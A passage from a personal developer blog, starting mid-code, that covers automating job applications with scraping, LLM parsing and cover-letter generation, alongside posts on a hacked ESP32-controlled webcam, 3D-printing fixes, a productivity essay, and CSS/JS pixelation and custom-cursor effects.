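    empty. (In the real system the queue is Redis and the script runs
    inside a JS sandbox rather than as a Python callable.)"""
    try:
        job = jobs.get_nowait()
    except queue.Empty:
        return False
    try:
        job["run"]()  # stand-in for sandboxed script execution
        campaign_status[job["campaign_id"]] = "done"
    except Exception:
        # Crash-proof: the failure is contained to this campaign.
        campaign_status[job["campaign_id"]] = "failed"
    return True

jobs.put({"campaign_id": "a", "script_type": "cleanup", "run": lambda: None})
jobs.put({"campaign_id": "b", "script_type": "fetch", "run": lambda: 1 / 0})
while worker_step():
    pass
```

Campaign "b" blows up, campaign "a" completes anyway - that isolation is the whole point.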
You can literally close your browser, go get coffee, maybe actually prepare for those interviews you're about to get. When a script finishes, the worker:

- Takes the output and saves it to the right place in MongoDB
- Updates the campaign status
- Cleans up any temporary data
- Moves on to the next job

And because it's all queue-based, you can have multiple workers running if you need to process more campaigns. Let me walk you through how data actually flows through the system:

Raw HTML Processing:
- User dumps raw HTML from job boards into a campaign
- A script using Cheerio extracts basic details (job ID, title, salary)
- Smart error handling catches missing fields early
- HTML gets minified to save storage (we went from 175KB to 32KB per job)

Job Details Fetching:
- System hits each job URL with proper headers (looking like a real browser)
- Handles different request types (GET for the main page, POST for "how to apply")
- Adds delays between requests (2-3 seconds) to be nice to job boards
- Handles timeouts and expired job postings gracefully

AI-Powered Data Cleaning:
- Turns messy HTML into structured job data
- Extracts everything from salary ranges to required skills
- Formats job descriptions as clean markdown
- Every response includes metadata about processing time and data quality

Cover Letter Generation:
- Pulls your resume from a configured source (GitHub in my case)
- Matches your skills against job requirements
- Generates both HTML and plain text versions
- Even includes metadata about which skills matched
- Fails fast if critical info is missing

Here's where things get really interesting.
The email generation system isn't just sending form letters - it's creating completely personalized applications:

Smart Resume Handling:
- Pulls your resume from a configured source
- Parses skills and experience
- Maps your background to job requirements

Template-Free Generation:
- No generic "I saw your posting" emails
- Each letter references specific job details
- System tracks key points addressed
- Includes metadata about skill matches

Quality Control:
- Generates both HTML and plain text versions
- Fails fast if critical info is missing
- Tracks missing recommended fields
- Analyzes tone and content

Sending System:
- Handles rate limiting automatically
- BCC's you on all applications

The system even includes metadata about how well your experience matches the job requirements. It's like having a really picky editor who happens to be really, really fast.

Remember how in Part 1 I mentioned the email system? Oh boy. That deserves its own article. In Part 3, I'm going to tell you about:

- Getting rejected by AWS
- The pitfalls of self-hosted SMTP servers
- Understanding why big companies don't want you sending automated job applications
- Finally finding a solution that works

Plus, I'll tell you how I got a job offer before even finishing this project. (Spoiler: It involves accidentally automating myself into a corner.) In the meantime, check out jaas.fun for:

- The complete source code
- A guide on writing scripts and using the application (written with the same attention to detail as my commit messages - "fixed stuff")
- A video demo of the system in action

Want to know when Part 3 drops? The one with all the juicy email server drama? Follow me on Twitter or LinkedIn. It has all the lessons learned about email infrastructure, rate limiting, and why not all shortcuts lead to where you think they will.
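One last sketch before Part 3 - my own illustration, not the production code - of what the fail-fast check plus skill-match metadata described above might look like:

```python
def application_metadata(resume_skills: set, job_requirements: set,
                         contact_email) -> dict:
    # Fail fast: without a contact email there is nothing to send to,
    # so the letter never gets generated or sent.
    if not contact_email:
        raise ValueError("critical info missing: no contact email")
    matched = sorted(resume_skills & job_requirements)
    missing = sorted(job_requirements - resume_skills)
    return {
        "matched_skills": matched,   # what the cover letter can lean on
        "missing_skills": missing,   # gaps worth addressing explicitly
        "match_ratio": len(matched) / max(len(job_requirements), 1),
    }

meta = application_metadata(
    {"python", "mongodb", "redis"},
    {"python", "redis", "kubernetes"},
    "recruiter@example.com",
)
```

The ratio is the "picky editor" part: a low score is a hint to rework the letter (or skip the job) before anything goes out.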

David Dodda 11 months ago

How I Automated My Job Application Process. (Part 1)

Look, I'll be honest - job hunting sucks. It's this soul-crushing cycle of copying and pasting the same information over and over again, tweaking your resume for the 100th time, and writing cover letters that make you sound desperate without actually sounding desperate. But here's the thing: repetitive tasks + structured process = perfect automation candidate. So I did what any sane developer would do - I built a system to automate the whole damn thing. By the end, I had sent out 250 job applications in 20 minutes. (The irony? I got a job offer before I even finished building it. More on that later.) Let me walk you through how I did it.

Think about it - every job application follows the same basic pattern:

1. Find a job posting
2. Check if you're qualified
3. Research the company (let's be real, most people skip this)
4. Submit resume + cover letter
5. Wait... and wait... and wait...

It's like a really boring video game where you do the same quest over and over, hoping for different results. I started by writing some quick Python scripts to test if this crazy idea could work. Here's how I broke it down.

First challenge: getting job listings at scale. I tried web scraping but quickly realized something: job boards are like snowflakes - each one is uniquely annoying to scrape. I tested dumping entire web pages into an LLM to clean the data, but:

- It was expensive as hell
- I didn't want the AI hallucinating job requirements (imagine explaining that in an interview)

So I went old school - manual HTML copying. Yes, it's primitive. Yes, it works. Sometimes the simplest solution is the best solution. The raw HTML was a mess, but I needed structured data out of it. Pro tip: You can just show ChatGPT a sample of your HTML and the output format you want, and it'll write the parsing script for you. Work smarter, not harder.

This part was straightforward but required some finesse. For each job listing, I made a GET request to fetch the full description.
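A sketch of that fetching step with stdlib urllib - the URLs and header values here are made up, and the fetch/sleep hooks are injectable so the loop can be dry-run without touching a real job board:

```python
import time
import urllib.request

def fetch_posting(url: str) -> str:
    # Look like a normal browser; some boards reject default client UAs.
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")

def fetch_all(urls, delay_s=2.5, fetch=fetch_posting, sleep=time.sleep):
    """GET every listing with a polite pause between requests."""
    pages = []
    for i, url in enumerate(urls):
        if i:  # no pause needed before the very first request
            sleep(delay_s)
        pages.append(fetch(url))
    return pages

# Dry run: swap in stubs instead of hitting a real site.
waits = []
pages = fetch_all(["/job/1", "/job/2", "/job/3"],
                  delay_s=2.0,
                  fetch=lambda u: f"<html>{u}</html>",
                  sleep=waits.append)
```

Making the delay a parameter (instead of hard-coding a sleep) also makes it painless to slow down further if a board starts pushing back.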
Each request returns raw HTML that still has all the website scaffolding - navigation bars, popups, footer junk, the works. I wrote a simple HTML parser to strip out everything except the actual job description. Sometimes you'll hit extra hurdles - like having to click a button to reveal the recruiter's email or company details. The good news? Since you're working with one job board at a time, you only need to figure out these patterns once.

Pro tip: Always add delays between requests. I set mine to 2-3 seconds. Sure, it makes the process slower, but it's better than getting your IP banned. Don't be that person who DDoSes job boards.

This is where it gets interesting. Job postings are like people - they all have the same basic parts, but the organization is chaos. Some list skills at the top, others bury them in paragraphs of corporate speak. Enter the LLM prompt that saved my sanity.

The secret to good cover letters? Context. I fed my resume into the LLM along with the job details. This way, the AI could match my experience with their requirements. Suddenly, those "I'm excited about this opportunity" letters actually had substance. The prompt does a few clever things:

- Forces structured output - no wishy-washy responses
- Tracks which of your skills match the job requirements
- Identifies any missing info that could strengthen the application
- Generates both HTML and plain text versions (because some job portals hate formatting)

And here's the kicker - it fails fast if critical info is missing. No more generic "I saw your job posting" emails. Either the cover letter has substance, or it doesn't get sent. Period. (I start all my prompts with "please," so that when AI eventually takes over, they'll consider me friendly 😁)

Last step - actually sending these beautifully crafted applications. Sounds simple, right? Just hook up an email service and blast away? Not so fast.
I needed a way to:

- Send professional-looking emails
- Track what was actually sent
- Monitor responses (can't ghost the recruiters)
- Not get flagged as spam (crucial!)

For testing, I sent all emails to a test account first. Pro tip: when you do send to actual recruiters, BCC yourself. Nothing worse than wondering "did that email actually go through?" At this stage of the POC, I just used a simple email provider like Mailgun. Quick, dirty, but effective. Don't worry - in Part 2, I'll tell you about the rabbit hole I went down trying to build a full email management system. (Spoiler: it involves rejected AWS applications and a failed attempt at running my own email server. Good times.)

The proof of concept worked better than expected. I could take a job board, extract listings, parse them, and generate personalized applications - all with a few Python scripts. But this was just the beginning. The real challenge? Turning these scripts into a proper application that could:

- Handle multiple job boards
- Track applications
- Manage email responses
- Not get me blacklisted from every HR system in existence

In Part 2, I'll show you how I built the actual application, complete with all the technical decisions, trade-offs, and "what was I thinking" moments. Stay tuned - it gets even better. Want to know when Part 2 drops? Follow me on Twitter or LinkedIn. And yes, I'll eventually tell you how I got a job offer before finishing this project. It's a good story.

David Dodda 1 years ago

Breaking My Camera (to make it better): A hardware hacking story

I've been using a hand-me-down Sony a5000 as my webcam for nearly 4 years. There was one massive pain point though: every time I needed to focus, adjust zoom, or simply turn it on, I had to physically lean over my desk like a caveman and touch the camera. This camera is from a different era (released in 2014), so it lacks remote control capabilities, especially when used as a webcam. So I did what any reasonable person would do - I cracked it open and took matters into my own hands.

First, I needed to understand how this camera's controls worked. After finding a repair manual online and watching a helpful YouTube video, I was able to disassemble it without any issues. Studying the repair manual, I identified the circuit responsible for all the functionality I wanted to control. All the buttons and switches that controlled power, zoom, and focus were on a single flexible PCB (RL-1025 FLEXIBLE BOARD). Initially, I considered intercepting the signals at the mainboard where the flex cable connects, but that was beyond my skill level due to the micro-soldering required. So I chose the more straightforward path and modified the flexible board directly. Here's what I did:

1. Desoldered the original buttons (zoom, power, and focus)
2. Soldered 5 wires to the flex board (4 to the pads left from the previous step, plus one for ground)
3. Routed the wires through the hole where the shutter button was supposed to be
4. Reassembled the camera after testing for any short circuits

Now we had 5 wires to work with. By connecting any of the 4 function wires (zoom in, zoom out, power, focus) to ground, we could mimic a button press. That's pretty cool, but not particularly helpful yet - you can't just hot-wire the camera like you're trying to steal a car every time you want to turn it on. So I connected the wires to a 4-channel relay that could be controlled by any micro-controller.
I chose an ESP32-based micro-controller for two reasons:

- It would let me control the camera over WiFi
- The ESP32-C3 Super Mini has a very small footprint (18mm x 22mm) and comes with a built-in ceramic antenna

After writing some code for the micro-controller, I set up a simple web dashboard to control the relays over the network. After adding all these controls to the camera, it would have been a shame to still need to get up to adjust the angle once it was set up. So why not add some pan and tilt functionality as well? I designed and 3D printed a simple 2-axis gimbal using two servo motors. This addition allows the camera to rotate both horizontally and vertically, all controlled through the same ESP32 board and web interface.

Is this janky? Maybe a little. But does it work? You bet it does. The best part? Every time someone asks about my camera setup on calls, I get to say, "Oh yeah, I built that myself." The total cost for the project was less than Rs 1,500 ($17.73), not including the cost of the camera.

NOTE: If you're opening any camera that has flash functionality, make sure to discharge the capacitors first. If you shock yourself, it hurts really badly and can potentially cause lasting damage.

I want to add side-to-side movement. I have some spare aluminum extrusion that I might use to create a gantry mechanism, adding an additional degree of movement.
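For the firmware-curious, the relay logic amounts to "close the channel, wait, open it". Here's a hedged sketch - the channel numbers and names are my guesses, not the actual wiring, and on the ESP32 the `set_channel` callback would wrap `machine.Pin`, but the core logic runs under plain Python too:

```python
import time

# Hypothetical wiring: which relay channel each camera function sits on.
RELAY_CHANNEL = {"power": 0, "zoom_in": 1, "zoom_out": 2, "focus": 3}

def press(action, set_channel, hold_s=0.2, sleep=time.sleep):
    """Mimic a button press: short the function wire to ground through
    its relay for a moment, then release it."""
    channel = RELAY_CHANNEL[action]
    set_channel(channel, True)    # relay closes -> wire pulled to ground
    sleep(hold_s)
    set_channel(channel, False)   # relay opens -> button "released"

# Dry run with stubs; a web dashboard handler would call press() per request.
events = []
press("zoom_in", set_channel=lambda ch, on: events.append((ch, on)),
      sleep=lambda s: None)
```

The web dashboard then just maps each button to one `press()` call, so the whole control surface stays four lines of wiring plus a lookup table.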

David Dodda 1 years ago

How I turned a perfect week into a 12-hour nightmare (a 3D printing story)

Listen - we need to talk about that moment when your perfectly dialed-in 3D printer decides to become your worst enemy. Here's what happened:

Last night: Check on print before bed. First 10 layers? PERFECT. Chef's kiss. I'm feeling like a genius. "Look at those layer lines. Smooth like butter." Me, an intellectual: "I'll just let it run overnight." (Future me is already laughing)

6AM: Stumble to the bathroom. Haven't even grabbed my toothbrush. Glance at the printer. Instead of my beautiful print, I'm staring at what looks like a modern art piece made of plastic spaghetti. The whole thing warped so badly, my print head decided to take it for a joyride around the build plate. The betrayal hits different before coffee. You know what's worse than a failed print? A failed print that waited until you weren't looking to fail. Like a teenager throwing a party when the parents leave town.

12 hours and 200 grams of fancy filament later, here's what I learned: when your prints look like abstract art, it usually comes down to THREE things (not two, I can't count before coffee):

1. Your temperature is wrong
2. You forgot about retraction
3. Your bed game is weak (yes, that's a thing)

Here's how to fix each one:

Temperature Drama
- Hot end too hot? Spaghetti art
- Too cold? Layer separation city
- The fix: Print a Temperature Tower. Every. New. Material.
- Takes 40-50 mins (find the gcode online or in your slicer)
- Saves you from my morning nightmare

Retraction Settings
Look, it's not rocket science. Turn them on. Your slicer has them somewhere. Google exists. Use it.

The Bed Situation
Here's the thing about beds - they're like relationships:
- Temperature matters (too cold, nothing sticks)
- Level matters (if it's not level, nothing else matters)
- Sometimes you need extra help (enter: the glue stick hack)

The crazy part? All of this could have been prevented with a simple temperature tower test. But no... I had to learn it the "wake up to chaos" way.
Let me break down the levels of 3D printing pain:

- LEVEL 1: Print fails while you watch
- LEVEL 2: Print fails overnight
- LEVEL 3: Print fails in the final 1% (I'm still recovering from that one)

Listen - don't be like me:

1. Print the damn temperature tower first
2. Verify with a quick calibration cube
3. Double-check those retraction settings

Your morning routine (and your filament budget) will thank you.

P.S. Yes, you can use a glue stick. No, it's not cheating. Yes, I judged people who did this before today.

P.P.S. Yes, my teeth are brushed now. Priorities.

P.P.P.S. Want to save yourself 12 hours and a morning crisis? Just remember: temperature tower first, retraction on, glue stick ready.

David Dodda 1 years ago

Duck Incremental Growth, Grow at Light-Speed

"Slow and steady wins the race." Here's the truth: If you want to win the race, you need to be a cheetah, not a tortoise.

When motivation strikes and you're ready to make a change, most people make the mistake of trying to grow incrementally in multiple areas at once. They set a bunch of small goals, hoping to slowly but surely improve across the board. But here's the problem: It's really freakin' hard to make progress in a bunch of different areas simultaneously. Your focus gets split, your energy gets drained, and before you know it, you've made a millimeter of progress in a million different directions.

Pick ONE thing you want to absolutely crush and become the best at. Then, give every waking hour of your life to it. Immerse yourself completely. Make it your North Star. Your media consumption, your reading, your learning, your experimentation - everything should revolve around this singular pursuit. If it's not pushing you closer to mastery in your chosen field, cut it out. Ruthlessly.

Forget about it. Work-life balance and rest are for people who are coasting or have already reached their goals. Winners are too busy sprinting towards the finish line to worry about balance.

Now maybe you're thinking: "What if I pick the wrong thing to obsess over?" Doesn't matter. Give it a solid month of single-minded focus. If after 30 days, you realize it's not for you, congrats - you figured it out faster than 99% of people. Plus, you've still gained a level of proficiency that will be a valuable tool in your toolbelt going forward.

Pick your path, put on your blinders, and grow at light-speed. Before you know it, you'll be miles ahead of the pack - while they're still inching along like tortoises. Remember: Obsession is a competitive advantage. Incremental progress is the slow lane. There's no speed limit on the road to greatness - so floor it.

David Dodda 1 years ago

Cool Profile Picture Animation in HTML, CSS, and JS

I saw this cool pixelation filter in the About Us section of a landing page, but it was static and boring. So I recreated the effect using pure HTML, CSS, and JS and animated it on hover to reveal the faces. (Photo by Alex Suprun on Unsplash.) I added this cool animated pixel effect to my portfolio site. It makes the profile picture come to life when you hover over it. Check it out at daviddodda.com. And shout-out to @domi_kissi and @inCleveri for the inspiration.
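Pixelation filters like this are typically implemented as block averaging: split the image into N×N cells, fill each cell with the average color of the pixels inside it, then shrink the cell size on hover to reveal the original. A minimal sketch of that core step in plain JavaScript (the pixelate helper and the grayscale 2D-array input are my own simplifications, not the exact code from the post - on a real page you'd read and write canvas ImageData instead):

```javascript
// Pixelate a grayscale image (2D array of 0-255 values) by averaging
// each `size` x `size` block and filling the block with that average.
function pixelate(pixels, size) {
  const h = pixels.length, w = pixels[0].length;
  const out = pixels.map(row => row.slice()); // copy, don't mutate input
  for (let by = 0; by < h; by += size) {
    for (let bx = 0; bx < w; bx += size) {
      // Average the block...
      let sum = 0, count = 0;
      for (let y = by; y < Math.min(by + size, h); y++) {
        for (let x = bx; x < Math.min(bx + size, w); x++) {
          sum += pixels[y][x];
          count++;
        }
      }
      const avg = Math.round(sum / count);
      // ...then paint the whole block with that average.
      for (let y = by; y < Math.min(by + size, h); y++) {
        for (let x = bx; x < Math.min(bx + size, w); x++) {
          out[y][x] = avg;
        }
      }
    }
  }
  return out;
}
```

Animating the hover reveal is then just a matter of shrinking `size` toward 1 over successive frames (e.g. with requestAnimationFrame) and redrawing.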

David Dodda 1 years ago

Cool Btn Hover Animation! (react)

IDK, just a cool btn hover animation. Yoinked it from the StreamElements landing page.

David Dodda 1 years ago

Beyond Generation: Getting the Most Out of AI-Generated Images

Welcome to the whimsical world of AI-generated images, where the only thing more exciting than creating them is jazzing them up! Let's embark on a pixel-perfect journey with four fab tools: Cleanup.pictures , Remove.bg , Imgupscaler.com , and Vectorizer.ai . First up is Cleanup.pictures , the digital equivalent of a magic wand. Wave goodbye to those photobombing squirrels or pesky power lines. This tool uses AI magic to make unwanted elements vanish - abraclean-dabra! Next, Remove.bg takes the stage. It's like a magician who makes backgrounds disappear in a poof! Perfect for when you want your subject to stand out, not the random lamp post in the background. It's so easy, you might say the backgrounds just 'PNG-out' of existence. Then there's Imgupscaler.com , your fairy godmother for small, blurry images. It transforms your 'Cinderella' pixels into a stunning 4K 'ball-ready' vision. No more squinting at pixelated pictures - it's time for a clarity party! Finally, Vectorizer.ai turns your images into vectors, the superheroes of scalability. Whether you're going as small as an ant or as big as a billboard, these vectors won't lose their cool. It's like yoga for your images - stretch without the stress! So there you have it, a journey from pixel purgatory to digital paradise. Remember, with these tools in your arsenal, your AI-generated images can go from 'meh' to 'masterpiece' in a few fun-filled steps.

David Dodda 1 years ago

Custom Cursors For The Web: Enhance UX with CSS & JS

In the world of web design, it's the small details that make a big difference. Customizing the cursor and adding a follower animation can significantly boost the interactivity and visual appeal of your website. This blog post will guide you through adding a custom cursor along with a follower effect using CSS and JavaScript.

Start by adding two elements to your HTML, one for the cursor and another for the cursor follower: These elements will serve as our custom cursor and its follower. Next, style both the cursor and the follower in CSS:

After setting up the HTML and CSS for the custom cursor and its follower, we need to add a small animation function in JavaScript. This function will create a smooth following motion for the cursor follower, enhancing the interactive experience. Use JavaScript to make the custom cursor track the mouse movement: This script enables the cursor and follower to follow the mouse movements on the screen.

Enhance your cursor's interactivity with hover animations over links by incorporating Font Awesome icons. First, ensure you've included Font Awesome in your HTML. Here, we use version 4: Modify your HTML links to include attributes that reference specific Font Awesome icons. It's important to use the correct icon name as per Font Awesome version 4: In this example, the attribute's value corresponds to the Twitter icon in Font Awesome v4. To make sure you're using the correct icon names from Font Awesome version 4, visit their website and search for icons. The icon name should exactly match the value in the attribute (see the Font Awesome v4 icon list).

Add CSS for the hover state of the cursor. When hovering over a link, the cursor will change its appearance and include the Font Awesome icon: Use JavaScript to change the cursor's appearance based on the hovered link. The cursor will dynamically display the corresponding Font Awesome icon.

With these steps, your website's cursor will not only follow the mouse but also change its appearance based on the hovered link, with the follower enhancing the visual effect. Custom cursor animations and follower effects offer a unique and creative way to boost user engagement on your website. By following the steps outlined above, you not only add these dynamic features but also open up a world of customization. Feel free to experiment and tweak the existing CSS and JavaScript to truly make these animations and effects your own. Whether it's adjusting the animation speed, changing colors, or experimenting with different shapes and sizes, the possibilities are endless. Dive in and give your site a personalized touch that reflects your style.
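The moving parts above can be sketched roughly like this. The element class names (.cursor, .cursor-follower) and the 0.15 easing factor are my own illustrative choices, not the post's exact code - the key idea is that the cursor snaps to the pointer while the follower eases toward it a little on every frame:

```javascript
// Linear interpolation: move a fraction `t` of the way from start to end.
function lerp(start, end, t) {
  return start + (end - start) * t;
}

// Guarded so this file also runs outside a browser; in a real page
// the two elements would exist in the HTML as described above.
if (typeof document !== "undefined") {
  const cursor = document.querySelector(".cursor");
  const follower = document.querySelector(".cursor-follower");
  let mouseX = 0, mouseY = 0;   // latest pointer position
  let followX = 0, followY = 0; // follower's eased position

  document.addEventListener("mousemove", (e) => {
    mouseX = e.clientX;
    mouseY = e.clientY;
    // The main cursor tracks the pointer immediately.
    cursor.style.transform = `translate(${mouseX}px, ${mouseY}px)`;
  });

  (function animate() {
    // The follower closes 15% of the remaining distance each frame,
    // which produces the smooth trailing motion.
    followX = lerp(followX, mouseX, 0.15);
    followY = lerp(followY, mouseY, 0.15);
    follower.style.transform = `translate(${followX}px, ${followY}px)`;
    requestAnimationFrame(animate);
  })();
}
```

Tweaking the 0.15 factor changes how lazily the follower trails the cursor: closer to 1 and it snaps, closer to 0 and it drifts.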
